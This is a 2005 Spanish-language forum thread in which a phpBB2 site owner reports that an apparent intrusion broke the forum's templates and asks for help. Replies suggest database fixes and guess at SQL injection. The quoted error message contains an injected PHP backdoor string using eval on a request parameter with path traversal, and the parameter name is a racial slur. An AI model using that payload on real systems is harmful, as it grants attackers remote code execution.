Foros del Web » Creando para Internet » Sistemas de gestión de contenidos »

Extraño error en phpBB2. Ayuda por favor!!

Estas en el tema de Extraño error en phpBB2. Ayuda por favor!! en el foro de Sistemas de gestión de contenidos en Foros del Web. Muy buenas, hoy me ha pasado una cosa muy extraña en mi foro. Al entrar me ha sorprendido que el aspecto del foro no es ...
  #1 (permalink)  
Antiguo 16/03/2005, 17:11
 
Fecha de Ingreso: diciembre-2004
Mensajes: 56
Antigüedad: 19 años, 5 meses
Puntos: 0
Extraño error en phpBB2. Ayuda por favor!!

Muy buenas, hoy me ha pasado una cosa muy extraña en mi foro. Al entrar me ha sorprendido que el aspecto del foro no es el que yo tenía predeterminado, ya que al instalarlo cambié el template "SubSilver" por el "Athena". Mejor dicho conservo los dos, pero esta configurado para Athena. La cosa es que al entrar estaba el que viene por defecto, asi que fui a mi panel de administración a mirar los templates y al pulsar en el desplegable solo estaba el Subsilver y uno que no me acuerdo como se llamaba... pero creo que contenía la palabra "...black...". Lo cambié y a partir de ahí ya no he vuelto a poder abrir el foro xq me sale este mensaje en pantalla:

phpBB : Error Crítico

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 335
File : /home/html/phpBB2/includes/functions.php



No tengo ni idea de que puede ser, por favor, a ver si me echais una mano. Gracias.

Nota: En el servidor no existe el template extraño que menciono. Por otra parte me gustaría cambiar a mano el archivo para que vuelva a mostrar el template por defecto con tal de no tenerlo cerrado pero no sé cual es.

Última edición por jesus111; 16/03/2005 a las 17:14
  #2 (permalink)  
Antiguo 17/03/2005, 17:43
 
Fecha de Ingreso: diciembre-2004
Mensajes: 56
Antigüedad: 19 años, 5 meses
Puntos: 0
Por favor, echadme una manita. ¿que archivos tengo que tocar para cambiar cambiar de template? no puedo acceder al foro cm administrador.
  #3 (permalink)  
Antiguo 19/03/2005, 22:29
Avatar de Spike_ak  
Fecha de Ingreso: marzo-2005
Ubicación: Argentina
Mensajes: 442
Antigüedad: 19 años, 2 meses
Puntos: 0
Yo Te Ayudo :p

Hola, segun el mensaje de error dice que hay un problema en la linea 335. Abri el archivo con el Block de notas y editala. Sino, podes subir todos los archivos de nuevo y volver al estado anterior y empezar de nuevo pero con el diseño viejo.
Chau
P.D: Nose que es Phpbb2 jejeje
  #4 (permalink)  
Antiguo 22/03/2005, 02:15
Avatar de yoseman  
Fecha de Ingreso: diciembre-2003
Ubicación: Alicante (Spain)
Mensajes: 471
Antigüedad: 20 años, 5 meses
Puntos: 5
A mi me ha pasado algo parecido y he optado por volver a instalar desde el ACP las plantillas. O sea no borres los archivos de la plantilla vía FTP y luego con el administrador la desinstalas y la vuelves a instalar.

Si tienes problemas para entrar en el administrador porque tienes definido en el perfil de tu admin una plantilla que ya no funciona, tienes que usar el PHPMyAdmin para definir a 1 (identificador de plantilla subSilver que deberías de tener instalada) el campo user_style de tu usuario administrador en la tabla phpbb_users .

Yo interpreto que lo que sucede es que alguien está deambulando por ahí utilizando algún tipo de argucia para hacer una sql injection que permite cambiar en la db, en concreto en la tabla de los estilos, todos los campos de aquellas plantillas que no sean la subSilver.

Y respecto del error, simplemente se trata de que al cambiarse los valores que debería de haber concernientes a la plantilla por esa cadena tan rara (si entras en la base de datos y consultas para la tabla phpbb_themes la fila de tu plantilla te darás cuenta de qué digo), pués phpBB intenta abrir algo que no existe.

Lo de la sql injection es una suposición mía dadfo que ya van varios foros dónde lo veo, pero cómo he estado algo despistado no lo sé de momento. Pero a mí me ha pasado justo lo mismo con esa diagnóstico de que el nombre de la plantilla isntala desaparece en el ACP.

Salu2 ;)
__________________
[+]
[+]

Última edición por yoseman; 22/03/2005 a las 02:35
  #5 (permalink)  
Antiguo 22/03/2005, 12:19
Avatar de ThE KuKa  
Fecha de Ingreso: agosto-2003
Ubicación: Sabadell
Mensajes: 114
Antigüedad: 20 años, 9 meses
Puntos: 17
A leer toca:
http://www.phpbb.com/phpBB/viewtopic.php?t=272959

S@lu2
__________________
phpBB en Castellano - phpBBMODs en Castellano
No doy soporte por privado.
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 12:04.